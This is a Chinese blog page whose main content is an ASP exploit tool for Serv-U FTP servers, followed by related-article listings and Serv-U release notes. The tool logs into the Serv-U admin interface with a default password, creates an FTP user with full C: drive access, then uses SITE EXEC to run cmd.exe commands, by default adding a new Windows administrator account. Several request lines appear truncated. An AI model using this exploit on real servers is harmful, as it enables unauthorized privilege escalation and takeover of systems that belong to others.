serv-u 最新通杀所有版本 EXP

最新推荐文章于 2021-08-13 05:08:46 发布
最新推荐文章于 2021-08-13 05:08:46 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: 技术文章 文章标签: button action border user table cmd 
<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
-->
</style>
<%
Function httpopen(neirong,fangshi,dizhi,refer,cookie)
set Http=server.createobject("Microsoft.XMLHTTP")
Http.open fangshi,dizhi,false
Http.setrequestheader "Referer",refer
Http.setrequestheader "Content-type","application/x-www-form-urlencoded"
Http.setrequestheader "Content-length",len(neirong)
Http.setrequestheader "User-Agent","Serv-U"
Http.setrequestheader "x-user-agent","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)"
If cookie<>"" then
Http.setrequestheader "Cookie",cookie
End If
Http.send neirong
httpopen=bytes2BSTR(Http.responseBody)
set Http=nothing
end Function

Function getmidstr(L,R,str)
int_left=instr(str,L)
int_right=instr(str,R)
If int_left>0 and int_right>0 Then 
getmidstr=mid(str,int_left+len(L),int_right-int_left-len(L))
Else
getmidstr="执行的字符串中不包含“"&L&"”或“"&R&"”" 
End If
end Function

Function bytes2BSTR(vIn) 
strReturn = "" 
For i = 1 To LenB(vIn) 
ThisCharCode = AscB(MidB(vIn,i,1)) 
If ThisCharCode < &H80 Then 
strReturn = strReturn & Chr(ThisCharCode) 
Else 
NextCharCode = AscB(MidB(vIn,i+1,1)) 
strReturn = strReturn & Chr (CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
i = i + 1 
End If 
Next 
bytes2BSTR = strReturn 
End Function 
%>
<%
    '----------自定义参数开始-----------

action=Request("action")
loginpass=Request.Form("loginpass")
port=Request("port")
mydomain=Request.Form("mydomain")
path=Request.Form("path")
ftpport = Request.Form("ftpport")
user=Request.Form("user")
pass=Request.Form("pass")
cmd= Request.Form("cmd")
sessionid=Request("sessionid")
organizationId=Request("OrganizationId")
userid=Request("userid")
domainid=Request("domainid")

    '----------自定义参数结束-----------

select case action

case 1
   returns=httpopen("user=&pword="&loginpass&"&language=zh%2CCN%26","POST","","")
   sessionid=getmidstr("<sessionid>","</sessionid>",returns)
   if sessionid<>"" then
   Response.Write "login ok!"&"</br>"
   Response.redirect "?action=2&sessionid="&sessionid&"&port="&port
   else
   Response.Write "error!"&"</br>"
   end if  

case 2
   call main2()

case 3
   returns=httpopen("","POST",")
   organizationIdTemp=mid(returns,instr(returns,"OrganizationUsers.xml&ID="),len("OrganizationUsers.xml&ID=")+15)
   organizationId=mid(OrganizationIdTemp,instr(OrganizationIdTemp,"=")+1,instr(OrganizationIdTemp,"""")-instr(OrganizationIdTemp,"=")-1)
   if organizationId<>"" then
   Response.write "get organizationId "&OrganizationId&" ok!"&"</br>"
   Response.redirect "?action=4&sessionid="&sessionid&"&port="&port&"&OrganizationId="&OrganizationId
                else
   Response.write "error!"&"</br>"
   end if

case 4
   call main3()

case 5
   returns=httpopen("","POST",")
userid=getmidstr("<var name=""ObjectID"" val=""",""" />",returns)
   if userid<>"" then
   Response.write "get userid "&userid&" ok!"&"</br>"
   Response.redirect "?action=6&sessionid="&sessionid&"&port="&port&"&OrganizationId="&OrganizationId&"&userid="&userid
   else
   Response.write "error!"
   end if

case 6
   call main4()

case 7
   returns=httpopen("Access=7999&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&","POST",")
   returns=httpopen("LoginID="&user&"&FullName=&Password="&pass&"&ComboPasswordType=%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81&PasswordType=0&ComboAdminType=%E6%97%A0%E6%9D%83%E9%99%90&AdminType=&ComboHomeDir=%2FC%3A&HomeDir=%2F"&path&"&ComboType=%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7&Type=0&ExpiresOn=0&ComboWebClientStartupMode=%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF&WebClientStartupMode=&LockInHomeDir=0&Enabled=1&AlwaysAllowLogin=1&Description=&=&IncludeRespCodesInMsgFiles=&ComboSignOnMessageFilePath=&SignOnMessageFilePath=&SignOnMessage=&SignOnMessageText=&ComboLimitType=%E8%BF%9E%E6%8E%A5&LimitType=Connection&QuotaBytes=0&Quota=0&","POST",")
   Response.write "add user ok!"&"</br>"
   Response.redirect "?action=8&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId

case 8
   call main5()

case 9
   returns=httpopen("DomainName="&mydomain&"&Description=test1&Enabled=1&EnableFTP=1&EnableFTPS=0&EnableSSH=0&EnableHTTP=0&EnableHTTPS=0&FTPPort="&ftpport&"&FTPSPort=990&SSHPort=22&HTTPPort=80&HTTPSPort=443&BindIPAddress=&","POST",")
   domainid=getmidstr("<ObjectID>","</ObjectID>",returns)
   Response.write "create domain ok!"&"</br>"
   Response.redirect "?action=10&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId&"&domainid="&domainid

case 10
   call main6()

case 11
   set b=Server.CreateObject("Microsoft.XMLHTTP")
   b.open "GET", "", false, "", ""
   b.send "User " & user & vbCrLf & "pass "& pass & vbCrLf & "site exec c:\windows\system32\cmd.exe /c "& cmd & vbCrLf & "QUIT" & vbCrLf
   Response.Write Replace(b.responseText,chr(13),"<br>")
   Response.redirect "?action=12&userid="&userid&"&port="&port&"&sessionid="&sessionid&"&OrganizationId="&OrganizationId&"&domainid="&domainid

case 12
   call main7()

case 13
   returns=httpopen("IDs="&domainid&"&","POST",")
   Response.Write "临时域清理完毕!用户请手动清理,因为serv-u的userid变化我搞不懂."&"</br>"

case else
   call main1()

end select

sub main1()
%>
<form id="form1" name="form1" method="post" action="?action=1">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第一步:获取sessionid</strong></td>
    </tr>
    <tr>
      <td align="right">管理端口:</td>
      <td><input name="port" type="text" id="port" value="43958" /></td>
    </tr>
    <tr>
      <td align="right">管理员密码:</td>
      <td><input name="loginpass" type="text" id="loginpass" value="1" /></td>
</tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>
<p align=center><strong>一般情况下不用改,如果管理员改了的话就填上去.</strong></p>
<%
end sub
%>
<% sub main2() %>

<form id="form1" name="form1" method="post" action="?action=3&sessionid=<%=sessionid%>&port=<%=port%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第二步:获取OrganizationId</strong></td>
    </tr>

    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>
<p align=center><strong>这一步有点慢,请等待.</strong></p>

<% end sub %>
<% sub main3() %>

<form id="form1" name="form1" method="post" action="?action=5&sessionid=<%=sessionid%>&port=<%=port%>&OrganizationId=<%=OrganizationId%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第三步:获取userid</strong></td>
    </tr>

    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>

<% end sub %>
<% sub main4() %>

<form id="form1" name="form1" method="post" action="?action=7&sessionid=<%=sessionid%>&port=<%=port%>&OrganizationId=<%=OrganizationId%>&userid=<%=userid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第四步:加用户</strong></td>
    </tr>
    <tr>
      <td align="right">新ftp账号:</td>
      <td><input name="user" type="text" id="user" value="ash" /></td>
    </tr>
    <tr>
      <td align="right">新ftp密码:</td>
      <td><input name="pass" type="text" id="pass" value="hahaha" /></td>
    </tr>
    <tr>
      <td align="right">系统路径:</td>
      <td><input name="path" type="text" id="path" value="c:" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>

<% end sub %>
<% sub main5() %>

<form id="form1" name="form1" method="post" action="?action=9&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>第五步:创建域</strong></td>
    </tr>
    <tr>
      <td align="right">要添加的域:</td>
      <td><input name="mydomain" type="text" id="mydomain" value="testhack" /></td>
    </tr>
    <tr>
      <td align="right">域端口:</td>
      <td><input name="ftpport" type="text" id="ftpport" value="60000" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>

<% end sub %>
<% sub main6() %>

<form id="form1" name="form1" method="post" action="?action=11&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>&domainid=<%=domainid%>">
<table border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>执行命令</strong></td>
    </tr>

    <tr>
      <td align="right">FTP账号:</td>
      <td><input name="user" type="text" id="user" value="ash" /></td>
    </tr>
    <tr>
        <tr>
      <td align="right">FTP密码:</td>
      <td><input name="pass" type="text" id="pass" value="hahaha" /></td>
    </tr>
    <tr>
      <td align="right">FTP端口:</td>
      <td><input name="ftpport" type="text" id="ftpport" value="60000" /></td>
    </tr>
    <tr>
      <td align="right">你的语句:</td>
      <td><input name="cmd" type="text" id="cmd" value="net user admin admin123456 /add&net localgroup administrators admin /add" size="80" /></td>
    </tr>
    <tr>
      <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
      </td>
    </tr>
</table>
</form>
<p align=center><strong>注意:如果是serv-u 7.0,这里可以马上点提交.</strong></p>
<p align=center><strong>注意:如果是serv-u 7.0以上,请在执行完上一步之后过大概半分钟才提交.</strong></p>


<% end sub %>
<% sub main7() %>

<form id="form1" name="form1" method="post" action="?action=13&port=<%=port%>&userid=<%=userid%>&sessionid=<%=sessionid%>&OrganizationId=<%=OrganizationId%>&domainid=<%=domainid%>">
<table width="264" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
      <td colspan="2" align="center"><strong>删除临时域</strong></td>
    </tr>

    <tr>
   <td colspan="2" align="center"><input type="submit" name="button" id="button" value="提交" />
     </td>
    </tr>
</table>
</form>

<% end sub %>
 








                

        

        

    

  


    

      

        

            

              
                
                  hacke2
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
Serv-U的老版本

				
			

			

				

					06-28
				

			

		

		

			
				
Serv-U的老版本,更好使用,新的版本似乎不怎么好用。自己存一个老版本

			
		

	



                

              
                



	

		

			

				
					
Serv-U V15.2.1 多国语言版.zip

				
			

			

				

					12-27
				

			

		

		

			
				
 这份文档列出了Serv-U V15.2.1版本的发布注记,包括新特性、改进和已知问题,对升级或更新到这个版本的用户非常有用。  **installer_readme.txt**  这是一个安装说明文件,通常包含软件安装的额外信息,如许可协议...

			
		

	



                


  
              

                


	

		

			

				
					
我们需要收集软件“serv-u”截止目前的所有版本。_梁宝川:出现新版本的anki,你要立刻更新吗?...

				
			

			

				

					weixin_39825045的博客
				

				

					11-09
					
					508
					
				

			

		

		

			
				
每日写一篇文章的第2年189天anki考研找梁宝川事物是不断发展的,软件是不断迭代的。所有的软件都避免不了更新这个环节。尤其是一些发展态势比较好的软件。通过不断更新,给用户提供更优的服务体验。也在通过更新,消除一些bug。每一次的更新都会给一款软件带来一定程度的改变。有的是显性的,有的是隐性的。我对于软件的更新抱着一种积极的态度,尤其是大版本的更新。因为大版本的更新往往会带来一些非常便捷的功能。所...

			
		

	





	

		

			

				
					
serv-u最新通杀所有版本0day

				
			

			

				

					收集盒  Book box
				

				

					12-31
					
					764
					
				

			

		

		

			
				
转载注明:http://hi.baidu.com/r00ts/blog/item/5c673305d801222ce92488c8.html?timeStamp=1318420470453
EXP:
 


body,td,th {
font-size: 12px;
}
-->


Function httpopen(neirong,fangshi,dizhi,refer,c

			
		

	



		

			
		



	

		

			

				
					
收集软件“serv-u”截止目前的所有版本_违法违规收集公民个人信息,386个APP服务单位被依法查处,包括小说、新闻、娱乐等多个类型...

				
			

			

				

					weixin_39517199的博客
				

				

					11-27
					
					420
					
				

			

		

		

			
				
据公安部网络安全保卫局官方公众号消息,今年第一季度,全国公安机关网安部门充分发挥职能作用,加大公民个人信息保护力度,依法查处违法违规收集公民个人信息APP服务单位386个,涉及信息咨询、辅助学习、文学小说、新闻资讯、娱乐播报等多个类型。其中,97个APP服务单位被予以行政处罚,192个APP服务单位被依法责令改正违法行为,51个APP被下架、停运,有效保护了公民个人信息。突出典型案例为:1▊ “猎...

			
		

	





	

		

			

				
					
记一次Serv-U提权

				
			

			

				

					kendyhj9999的专栏
				

				

					03-09
					
					9700
					
				

			

		

		

			
				
记一次Serv-U提权



记一次Serv-U提权

http://hi.baidu.com/sdghgk/item/37b433ce7bce197489ad9e82
作者:白开
文章来源:http://hi.baidu.com/sdghgk
Serv-U提权可谓是老生常谈了,由于Serv-U的用户多,提权成功率也高,众多ASP木马纷纷将此提权功能集成在内。然而通过这次提权我发

			
		

	





	

		

			

				
					
Serv-U7.0.0.4.rar_Serv-U 7.0.0._ser-u7.0_serv u7_serv u7.0.0_ser

				
			

			

				

					09-23
				

			

		

		

			
				
Serv-U7.0.0.4 carck Serv-U7.0.0.4 carck

			
		

	





	

		

			

				
					
FTP-Serv-u6.4.zip_serv-u

				
			

			

				

					09-20
				

			

		

		

			
				
FTP服务器端软件Serv-u6.4使用说明

			
		

	





	

		

			

				
					
serv-u与屏保导致serv-u服务器经常停止无法连接的解决方法

				
			

			

				

					09-30
				

			

		

		

			
				
标题中的“serv-u与屏保导致serv-u服务器经常停止无法连接的解决方法”是指在Windows 2003服务器上运行的Serv-U FTP服务器遇到的一个常见问题,即服务器经常无故停止服务,导致用户无法连接。这个问题起初被认为可能...

			
		

	





	

		

			

				
					
Serv-U占用IIS的80端口造成冲突导致iis无法运行的解决方法(serv_u6-8版本)

				
			

			

				

					01-10
				

			

		

		

			
				
我们是怎么发现serv_u占用iis的80端口的呢,大家可以参考软件开发网的这篇文章IIS 另一个程序正在使用此文件,进程无法访问。 如何查看哪个程序打开了tcp 80端口呢?...这种情况一般表示Serv-u没有抢占到8

			
		

	





	

		

			

				
					
FTP工具经典版-Serv-U6.3.01稳定版

				
			

			

				

					03-07
				

			

		

		

			
				
FTP-Serv-U6.3.01稳定版,网络传输经典工具之一

			
		

	





	

		

			

				
					
目前遇到最好用 ser-u服务器版本

				
			

			

				

					11-11
				

			

		

		

			
				
目前遇到最好用 ser-u服务器版本 亲测能用 大家可以放心下载使用

			
		

	





	

		

			

				
					
Serv-U 6.4 ftp服务器经典怀旧版本

				
			

			

				

					10-31
				

			

		

		

			
				
ftp服务器 经典怀旧 版本
ha_Serv-U6406
ServU6402

			
		

	





	

		

			

				
					
Serv-U安装包及补丁

				
			

			

				

					11-14
				

			

		

		

			
				
Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件!与Windows自带的FTP服务器不同的是:Serv-U同时支持主动和被动式FTP服务器搭建,更方便个人或小团队用户映射外网访问使用

			
		

	





	

		

			

				
					
Serv-U最新注册版

				
			

			

				

					03-19
				

			

		

		

			
				
Serv-U是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等,功能非常完备。 它具有非常完备的安全特性,支持SSl FTP传输,支持在多个Serv-U和FTP客户端通过SSL加密连接保护您的数据安全等。

Serv-U 是目前众多的FTP 服务器软件之一。通过使用Serv-U,用户能够将任何一台PC 设置成一个FTP 服务器,这样,用户或其他使用者就能够使用FTP 协议,通过在同一网络上的任何一台PC与FTP 服务器连接,进行文件或目录的复制,移动,创建,和删除等。这里提到的FTP 协议是专门被用来规定计算机之间进行文件传输的标准和规则,正是因为有了象FTP 这样的专门协议,才使得人们能够通过不同类型的计算机,使用不同类型的操作系统,对不同类型的文件进行相互传递。  

虽然目前FTP 服务器端的软件种类繁多,相互之间各有优势,但是Serv-U 凭借其独特的功能得以展露头脚。具体来说,Serv-U 能够提供以下功能: 
符合windows 标准的用户界面友好亲切,易于掌握。
支持实时的多用户连接,支持匿名用户的访问;
通过限制同一时间最大的用户访问人数确保PC 的正常运转。
安全性能出众。在目录和文件层次都可以设置安全防范措施。
能够为不同用户提供不同设置,支持分组管理数量众多的用户。
可以基于IP 对用户授予或拒绝访问权限。
支持文件上传和下载过程中的断点续传。
支持拥有多个IP 地址的多宿主站点。
能够设置上传和下载的比率,硬盘空间配额,网络使用带宽等,从而能够保证用户有限的资源不被大量的FTP 访问用户所消耗。
可作为系统服务后台运行。
可自用设置在用户登录或退出时的显示信息,支持具有UNIX 风格的外部链接。


7.0.0.1 新功能介绍(2008年4月3日发布)
====================
+ 使用内置的 web 客户端,添加了对 HTTP 协议的支持。
+ 添加了对 SSH 协议的支持。
+ 添加了对使用 HTTP 协议的 FTP Voyager JV 的支持。
+ 添加了 THMB 命令,可以将图形文件转换为缩略图然后下载。THMB 命令的作用方式与 RETR 完全一致,只是在传输前文件已按指定的格式被压缩到最大尺寸以内。
+ 添加了 HOST 命令,它可以使 FTP 客户端更改到服务器上的特定域。这使得 FTP 服务器可在单个 IP 地址和端口上支持多个域。注意:并非所有的 FTP 客户端都支持该功能。支持这一功能的客户端如 FTP Voyager。
+ 添加了 DSIZ 命令,以返回目录内容的大小(包括子目录在内)。可以指定目录,如果留空则使用当前工作目录。
+ 添加了 AVBL 命令,以返回目录中可用的字节数。可以指定目录,如果留空则使用当前工作目录。
+ 添加了启用/禁用特定 FTP 命令的功能。
+ 添加了更改几乎任何 FTP 命令响应的功能。
+ 添加了动态 HELP 信息,其中 HELP 发送所有支持的和启用的命令信息。
+ 添加了命令级 HELP。例如,"HELP LIST" 将返回有关 LIST 命令的特定帮助信息。
+ 当读取客户端正在下载的文件时,添加了使用浮动缓冲区大小的功能。浮动缓冲区大小取决于当前的传输率,这使得传输效率大大提高。
+ 添加了目录重命名权限设置。
+ 添加了文件重命名权限设置。
+ 添加了 "\" 路径概念。"\" 路径类似于 Windows 资源管理器中的 "我的电脑"。当用户的根目录设置为 "\" 时,"/" 列表显示了可用的磁盘驱动器。当在用户、群组、域或服务器级别启用 "允许根('/')为未锁定用户列出驱动器" 时,未登录根目录的用户也可以充分利用该功能。
+ 更改了 FEAT 命令,使其仅列出已启用的特殊命令。
+ 更改了 "OPTS MLST" 命令,从而对未严格遵守 RFC 的客户端更为宽容。例如,Serv-U 现在既接受 "OPTS MLST Type;Size;Modify;Perm;",也接受 "OPTS MLST Type;Size;Modify;Perm"。
+ 为 MLST 和 MLSD 命令添加了 "Perm" 功能,"Perm" 标识了 MLST/MLSD 列表中与连接用户相关项目的权限。
+ 为 MLST 和 MLSD 命令添加了 "Win32.dt" 功能。当列出 /C:/、/D:/、或 / 时,"Win32.dt" 为磁盘驱动器列表标识了驱动器类型。如果对象不是磁盘驱动器,则不会在目录列表中返回该功能的结果。
+ 为 MLST 和 MLSD 命令添加了 "Win32.dl" 功能。当列出 /C:/、/D:/、或 / 时,"Win32.dl" 为磁盘驱动器列表标识了驱动器卷标。如果对象不是磁盘驱动器,则不会在目录列表中返回该功能的结果。
+ 对于 "os.UNIX=slink",添加更多信息到 MLST / MSLD Type 结果,并且如果向用户提供 ":linked_path",则 Serv-U 还会追加该信息。
+ 改进了 Windows 快捷方式解决方案,以同时包括使用相对路径和其他属性组合的快捷方式。
+ 添加了使用 "SITE EXEC" 命令时指定带空格的路径名的功能。如果需要使用空格,Serv-U 将文件名括起来解析。
+ 添加了 XDEL 命令,功能与 DELE 命令相同。
+ 添加了 RMDA 目录作为 RMD 的父集,使得客户端可以用一个命令删除目录及其所有文件和子目录。一则错误响应指出客户端应刷新其目录列表,以确定哪些文件和子目录被删除,哪些未被删除。
+ 更改了 Windows 链接支持,从而当遇到 Windows .LNK 文件时,对于 SIZE 命令和传输操作,将其作为列表显示时所引用的文件处理。
+ 删除了 -L LIST 和 NLST 选项,因为它们会与其他设置冲突。
+ 在辅助线程执行所有冗长的命令,以便释放主线程供其他客户端使用。这些操作包括 LIST、NLST、MLST、MLSD、RMDA、RETR、THMB、RNTO、XCRC、STOR、APPE、STOU、SITE EXEC 以及所有其他冗长的操作。
+ 添加了使用多个 CPU 的功能,以执行占用 CPU 较多的操作。
+ 向 "226 传输完成" 应答中添加了传输总量和传输速率信息。
+ 向压缩的 "226 传输完成" 应答中添加了压缩总量、统计和传输速率信息。
+ 添加了在域上以及服务器上定义反攻击限制的功能。
+ 将消息文件中最大字符串长度从 195 个字符增加到 512 个字符。
+ 添加了一个选项以包含服务器对 FTP 命令处理器的响应值,从而在多行响应的每一行中包含数字响应代码。
+ 添加了一个选项以包含服务器对个别消息文件的响应值。
+ 使用合适的 FTP 命令移动消息文件设置到个别命令处理器。
+ 添加了基于文件扩展名,为某些类型的文件设置最大文件尺寸的功能。该功能通过目录访问规则得以实现,在规则中可使用通配符来标识文件访问权限。
+ 为目录访问规则中指定的目录添加了最大目录尺寸限制,以取代磁盘配额。
+ 除了会话带宽限制,还为整个服务器、每个域、每个群组和每个用户添加了上传和下载带宽限制。
+ 为 STAT 命令添加了更多统计信息。
+ 改进了 ALLO 命令,使其不仅能够检查可用的硬盘空间,还能检查用户可用的磁盘空间数量。该处更改考虑了配额和目录大小限制。
+ 添加了使用 FTP LIST 命令,以 Microsoft IIS FTP Server (-h:IIS) 格式,或 DOS (-h:DOS) (Windows 2000 或更高版本中的命令行) 格式,显示目录列表的功能。
+ 添加了 -h:"DOS"、-h:"IIS"、和 -h:"UNIX" (默认) LIST 指令。-h:"DOS" 以类似于 Windows 命令行的方式列出文件和目录。-h:"IIS" 以类似于 Microsoft 的 IIS FTP 服务器的方式列出文件和目录。-h:"UNIX" 以类似于 BSD UNIX FTP 服务器的方式列出文件和目录。任何其他 -h"xxx" 指令都将恢复为 "UNIX" 样式的列表。该指令不区分大小写。
+ 更改了 IP 访问规则的操作。如果没有 "允许访问" 规则,则自动假定为 "*.*.*.*" 。 
+ 添加了功能,使得从活动会话列表中断开用户连接时,可以在 IP 访问规则列表中查看被阻止的 IP 地址。
+ 当上传并覆盖文件时,以指定的文件名重命名原始文件。
+ 更改了目录列表,使得当锁定用户于根目录时,不会显示 "." 和 ".." 。
+ 在正常显示 "." 和 ".." 的目录列表中,无论这两个目录是否存在于 Windows 中都正常显示。这有助于导航并防止用户推断出目录是否为根目录虚拟路径。
+ 添加了功能,可以使用 FTP 命令,在有关失败操作的日志中查看密码。
+ 添加了用户归类,有助于对用户进行合理的分组管理。当将用户分别置于不同类别中时,管理控制台和 Ser-U 都能更有效地操作。
+ 现在只需通过允许访问相应的物理路径,就可以授予虚拟路径的访问权限。早先的版本还需要明确设置虚拟路径的访问权。
- 修正了以下错误:至少登录一次以后当试图登录的次数超过了上限值时, Serv-U 会返回两个而不是一个错误应答。
- 修正了某些 LIST 和 NLST 参数不能正常工作的错误,例如忽略某些文件的 -I:"*.txt" 参数。
- 修正了 MLST/MLSD 中 Serv-U 返回的文件时间误差 1 小时的错误,这是因为服务器当前以夏时制运行而文件日期和时间并未采用夏时制,反之亦然。
- 修正了以下错误:当使用包含通配符的字符串指定完整的路径时,"子目录继承" 设置会被忽略。例如,即使选择了继承参数,C:\Windows\*.jpg 也不会包含 C:\Windows\System32\*.jpg。
- 修正了以下错误:当虚拟路径引用父目录时,递归目录列表会导致 Serv-U 崩溃。
- 修正了以下错误:当使用 "盲" 目录时,如果可以访问至少嵌套两层的目录,则会话可能永远无法使用 CWD 命令返回根目录。

托盘
+ 添加了新的风格菜单。
+ 添加了使用不同主题的功能。
+ 添加了主题编辑器。
+ 添加了气球提示。
+ 添加了自动更新检查器。
+ 在弹出式菜单中添加了支持链接。
+ 在鼠标置于上方时出现的工具提示中添加了更多统计信息。

			
		

	





	

		

			

				
					
cve-1999-0614 ftp服务器版本信息可被获取,最新CVE-2019-12181 Serv-U FTP Server < 15.1.7 - 本地提权漏洞...

				
			

			

				

					weixin_39900286的博客
				

				

					08-13
					
					592
					
				

			

		

		

			
				
不多说,直接上源码吧/*CVE-2019-12181Serv-U15.1.6PrivilegeEscalationvulnerabilityfoundby:GuyLevin(@va_start-twitter.com/va_start)https://blog.vastart.devtocompileandrun:gccservu-pe-cve-2019-12181....

			
		

	





	

		

			

				
					
Serv-U FTP Server 越权遍历漏洞 exploit

				
			

			

				

					
				

			

		

		

			
				
1. 升级到最新版本Serv-U FTP Server,以修复漏洞。 2. 使用强密码和用户名来防止未经授权的访问。 3. 限制FTP服务器的访问权限,仅允许可信任的用户访问。 4. 监控FTP服务器的日志,检测可疑的活动。   Serv-U...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值